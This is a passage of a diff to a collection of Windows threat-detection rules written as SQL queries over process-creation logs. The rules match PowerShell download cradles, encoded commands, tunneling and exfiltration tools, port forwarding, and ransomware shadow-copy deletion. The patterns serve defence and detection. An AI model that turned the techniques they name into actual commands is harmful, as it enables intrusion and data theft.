'\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_powershell_invocation_specific.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "description": "Detects suspicious encoded character syntax often used for defense evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "PowerShell Get-Clipboard Cmdlet Via CLI", - "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "title": "Psexec Execution", + "id": "730fc21b-eaff-474b-ad23-90fd265d4988", "status": "test", - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects user accept agreement execution in psexec commandline", + "author": "omkar72", "tags": [ - "attack.collection", - "attack.t1115" + "attack.execution", + "attack.t1569", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Administrative scripts." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" ], - "filename": "proc_creation_win_powershell_get_clipboard.yml" + "filename": "proc_creation_win_sysinternals_psexec_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Exfiltration and Tunneling Tools Execution", - "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "status": "test", - "description": "Execution of well known tools for data exfiltration and tunneling", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Weak or Abused Passwords In CLI", + "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "status": "experimental", + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate Administrator using tools" + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\socat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" }, { - "title": "Suspicious aspnet_compiler.exe Execution", - "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "author": "frack113", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "WSL Child Process Anomaly", - "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "InfDefaultInstall.exe .inf Execution", - "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", - "status": "test", - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "author": "frack113", + "title": "Wscript Execution from Non C Drive", + "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "status": "experimental", + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "author": "Aaron Herman", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate scripts located on other partitions such as \"D:\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" ], - "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1090" + "attack.t1219" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_frp.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.g0069" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "DeviceCredentialDeployment Execution", - "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", - "status": "experimental", - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "status": "test", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", - "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Writing Of Malicious Files To The Fonts Folder", + "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "status": "test", + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.t1211", + "attack.t1059", + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName 